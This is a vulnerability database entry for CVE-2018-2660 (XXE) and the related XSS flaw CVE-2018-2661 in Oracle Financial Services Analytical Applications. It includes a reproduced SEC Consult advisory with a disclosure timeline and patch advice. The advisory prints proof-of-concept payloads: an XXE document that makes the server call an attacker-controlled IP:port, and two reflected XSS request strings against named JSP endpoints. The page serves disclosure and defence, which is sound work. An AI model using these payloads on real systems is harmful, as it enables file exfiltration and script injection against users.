Vulnerabilities > CVE-2018-2660 - Unspecified vulnerability in Oracle Financial Services Analytical Applications Infrastructure

047910
CVSS 6.5 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
oracle

Summary

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure component of Oracle Financial Services Applications (subcomponent: Core). Supported versions that are affected are 7.3.5.x and 8.0.x. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.0 Base Score 7.4 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/146057/SA-20180123-0.txt
idPACKETSTORM:146057
last seen2018-01-24
published2018-01-24
reporterSamandeep Singh
sourcehttps://packetstormsecurity.com/files/146057/Oracle-Financial-Services-Analytical-Applications-7.3.5.x-8.0.x-XXE-Injection-XSS.html
titleOracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

Seebug

bulletinFamilyexploit
descriptionVendor description: ------------------- "Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need." Source: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html Business recommendation: ------------------------ By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues. Vulnerability overview/description: ----------------------------------- #### 1) XML eXternal Entity (XXE) Injection (CVE-2018-2660) The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application. #### 2) Reflected Cross Site Scripting (CVE-2018-2661) This vulnerability allows an unauthenticated user to inject malicious client side script which will be executed in the browser of a user if he visits the manipulated URL. Proof of concept: ----------------- #### 1) XML External Entity Injection (XXE) (CVE-2018-2660) For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made. ``` <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo> ``` `IP:port` = IP address and port where the attacker is listening for connections Furthermore some files can be exfiltrated to remote servers via the techniques described in: * https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf * http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf #### 2) Reflected Cross Site Scripting (CVE-2018-2661) The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box: ``` URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle= METHOD : GET PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E ``` ``` URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp? url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~ METHOD : GET PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm ``` Vulnerable / tested versions: ----------------------------- The following version has been tested which was the most recent one when the vulnerabilities were discovered: * Oracle Financial Services Analytical Applications 8.0.4.0.0 According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018. Vendor contact timeline: ------------------------ * 2017-09-11: Contacting vendor through encrypted email ([email protected]) * 2017-09-20: Vendor requested to postpone the release date * 2018-01-13: Vendor informed that Critical Patch Update that includes fixes of reported issues will be released on * 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues * 2018-01-23: Public disclosure of advisory Solution: --------- Apply patch update in the January 2018 Critical Patch Update: http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
idSSV:97124
last seen2018-02-03
modified2018-02-02
published2018-02-02
reporterRoot
titleOracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection(CVE-2018-2660) / XSS(CVE-2018-2661)